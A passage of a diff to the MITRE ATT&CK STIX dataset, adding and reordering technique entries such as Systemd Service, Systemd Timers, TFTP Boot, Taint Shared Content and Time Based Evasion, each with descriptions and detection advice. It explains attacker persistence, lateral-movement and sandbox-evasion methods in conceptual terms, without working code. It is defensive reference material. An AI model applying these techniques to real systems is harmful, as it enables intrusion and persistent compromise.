start\" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "name": "System Service Discovery", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process monitoring", + "Process command-line parameters" ], + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_permissions_required": [ "User", "Administrator", "SYSTEM" ], - "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", - "x_mitre_data_sources": [ - "Process monitoring", - "Process command-line parameters" + "x_mitre_platforms": [ + "Windows" ], - "x_mitre_version": "1.1" + "x_mitre_is_subtechnique": false }, { "external_references": [ @@ -27497,6 +31644,22 @@ ] }, { + "created": "2019-10-04T20:42:28.541Z", + "modified": "2020-03-27T21:18:48.149Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)", + "name": "System Shutdown/Reboot", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -27519,27 +31682,15 @@ "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019." } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "System Shutdown/Reboot", - "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)", - "id": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "impact" - } - ], - "modified": "2020-03-27T21:18:48.149Z", - "created": "2019-10-04T20:42:28.541Z", - "x_mitre_is_subtechnique": false, - "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.", - "x_mitre_version": "1.0", - "x_mitre_impact_type": [ - "Availability" + "x_mitre_data_sources": [ + "Windows event logs", + "Process command-line parameters", + "Process monitoring" ], "x_mitre_permissions_required": [ "User", @@ -27547,16 +31698,12 @@ "root", "SYSTEM" ], - "x_mitre_data_sources": [ - "Windows event logs", - "Process command-line parameters", - "Process monitoring" + "x_mitre_impact_type": [ + "Availability" ], - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ] + "x_mitre_version": "1.0", + "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.", + "x_mitre_is_subtechnique": false }, { "id": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", @@ -27669,7 +31816,7 @@ }, { "id": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", - "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)", + "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)", "name": "Systemd Service", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -27681,6 +31828,16 @@ "external_id": "T1543.002", "url": "https://attack.mitre.org/techniques/T1543/002" }, + { + "external_id": "CAPEC-550", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/550.html" + }, + { + "external_id": "CAPEC-551", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/551.html" + }, { "source_name": "Linux man-pages: systemd January 2014", "url": "http://man7.org/linux/man-pages/man1/systemd.1.html", @@ -27696,21 +31853,6 @@ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang", "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019." }, - { - "source_name": "gist Arch package compromise 10JUL2018", - "url": "https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a", - "description": "Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019." - }, - { - "source_name": "Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018", - "url": "https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/", - "description": "Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019." - }, - { - "source_name": "acroread package compromised Arch Linux Mail 8JUL2018", - "url": "https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html", - "description": "Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019." - }, { "source_name": "Rapid7 Service Persistence 22JUNE2016", "url": "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence", @@ -27728,7 +31870,7 @@ "phase_name": "privilege-escalation" } ], - "modified": "2020-03-25T22:13:59.473Z", + "modified": "2020-10-09T13:46:29.701Z", "created": "2020-01-17T16:15:19.870Z", "x_mitre_platforms": [ "Linux" @@ -27739,7 +31881,7 @@ "root" ], "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0", + "x_mitre_version": "1.2", "x_mitre_data_sources": [ "Process command-line parameters", "Process monitoring", @@ -27750,10 +31892,169 @@ ] }, { - "id": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "id": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", + "description": "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020)\n\nEach .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\n\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.", + "name": "Systemd Timers", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Taint Shared Content", - "description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1053.006", + "url": "https://attack.mitre.org/techniques/T1053/006" + }, + { + "source_name": "archlinux Systemd Timers Aug 2020", + "url": "https://wiki.archlinux.org/index.php/Systemd/Timers", + "description": "archlinux. (2020, August 11). systemd/Timers. Retrieved October 12, 2020." + }, + { + "source_name": "Linux man-pages: systemd January 2014", + "url": "http://man7.org/linux/man-pages/man1/systemd.1.html", + "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019." + }, + { + "description": "Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.", + "url": "https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/", + "source_name": "Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018" + }, + { + "description": "Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.", + "url": "https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a", + "source_name": "gist Arch package compromise 10JUL2018" + }, + { + "description": "Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.", + "url": "https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html", + "source_name": "acroread package compromised Arch Linux Mail 8JUL2018" + } + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "modified": "2020-10-14T15:20:00.754Z", + "created": "2020-10-12T17:50:31.584Z", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_contributors": [ + "SarathKumar Rajendran, Trimble Inc" + ], + "x_mitre_data_sources": [ + "File monitoring", + "Process monitoring", + "Process command-line parameters" + ], + "x_mitre_detection": "Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the \u2018root\u2019 user.\n\nSuspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers \u2013all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAudit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)", + "x_mitre_permissions_required": [ + "User", + "root" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1542.005", + "url": "https://attack.mitre.org/techniques/T1542/005" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Secure Boot", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#35", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Command History", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Boot Information", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#26", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot Information. Retrieved October 21, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "TFTP Boot", + "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)", + "id": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "modified": "2020-10-22T16:35:53.806Z", + "created": "2020-10-20T00:06:56.180Z", + "x_mitre_data_sources": [ + "Network device run-time memory", + "Network device command history", + "Network device configuration", + "File monitoring", + "Network device logs" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_detection": "Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nReview command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Network" + ] + }, + { + "created": "2017-05-31T21:31:01.759Z", + "modified": "2020-03-31T22:14:56.107Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "type": "attack-pattern", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -27771,38 +32072,30 @@ "source_name": "Retwin Directory Share Pivot" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "lateral-movement" - } - ], - "modified": "2020-03-31T22:14:56.107Z", - "created": "2017-05-31T21:31:01.759Z", - "x_mitre_is_subtechnique": false, - "x_mitre_system_requirements": [ - "Access to shared folders and content with write permissions" - ], - "x_mitre_platforms": [ - "Windows" - ], - "x_mitre_permissions_required": [ - "User" - ], - "x_mitre_detection": "Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.\n\nFrequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.", - "x_mitre_contributors": [ - "Michal Dida, ESET", - "David Routin" - ], + "description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.", + "name": "Taint Shared Content", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "x_mitre_version": "1.2", "x_mitre_data_sources": [ "File monitoring", "Process monitoring" ], - "x_mitre_version": "1.2" + "x_mitre_contributors": [ + "Michal Dida, ESET", + "David Routin" + ], + "x_mitre_detection": "Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.\n\nFrequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.", + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_system_requirements": [ + "Access to shared folders and content with write permissions" + ], + "x_mitre_is_subtechnique": false }, { "id": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", @@ -27994,18 +32287,41 @@ "external_references": [ { "source_name": "mitre-attack", - "external_id": "T1497.003", - "url": "https://attack.mitre.org/techniques/T1497/003" + "external_id": "T1597.001", + "url": "https://attack.mitre.org/techniques/T1597/001" + }, + { + "source_name": "D3Secutrity CTI Feeds", + "url": "https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/", + "description": "Banerd, W. (2019, April 30). 10 of the Best Open Source Threat Intelligence Feeds. Retrieved October 20, 2020." } ], "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Time Based Evasion", - "description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\n\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny. ", - "id": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "name": "Threat Intel Vendors", + "description": "Before compromising a victim, adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)\n\nAdversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "id": "attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41", "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:15:53.678Z", + "created": "2020-10-02T17:03:45.918Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "created": "2020-03-06T21:11:11.225Z", + "modified": "2020-07-01T16:32:02.532Z", "kill_chain_phases": [ { "kill_chain_name": "mitre-attack", @@ -28016,28 +32332,41 @@ "phase_name": "discovery" } ], - "modified": "2020-07-01T16:32:02.532Z", - "created": "2020-03-06T21:11:11.225Z", - "x_mitre_defense_bypassed": [ - "Host forensic analysis", - "Signature-based detection", - "Static File Analysis", - "Anti-virus" + "type": "attack-pattern", + "id": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\n\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny. ", + "name": "Time Based Evasion", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ", - "x_mitre_data_sources": [ - "Process monitoring", - "Process command-line parameters" - ], - "x_mitre_contributors": [ - "Deloitte Threat Library Team" + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1497.003", + "url": "https://attack.mitre.org/techniques/T1497/003" + } ], "x_mitre_platforms": [ "Linux", "macOS", "Windows" + ], + "x_mitre_contributors": [ + "Deloitte Threat Library Team" + ], + "x_mitre_data_sources": [ + "Process monitoring", + "Process command-line parameters" + ], + "x_mitre_detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_defense_bypassed": [ + "Host forensic analysis", + "Signature-based detection", + "Static File Analysis", + "Anti-virus" ] }, { @@ -28280,12 +32609,112 @@ "x_mitre_is_subtechnique": true, "x_mitre_version": "1.0" }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1588.002", + "url": "https://attack.mitre.org/techniques/T1588/002" + }, + { + "source_name": "Recorded Future Beacon 2019", + "url": "https://www.recordedfuture.com/identifying-cobalt-strike-servers/", + "description": "Recorded Future. (2019, June 20). Out of the Blue: How Recorded Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Tool", + "description": "Before compromising a victim, adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: 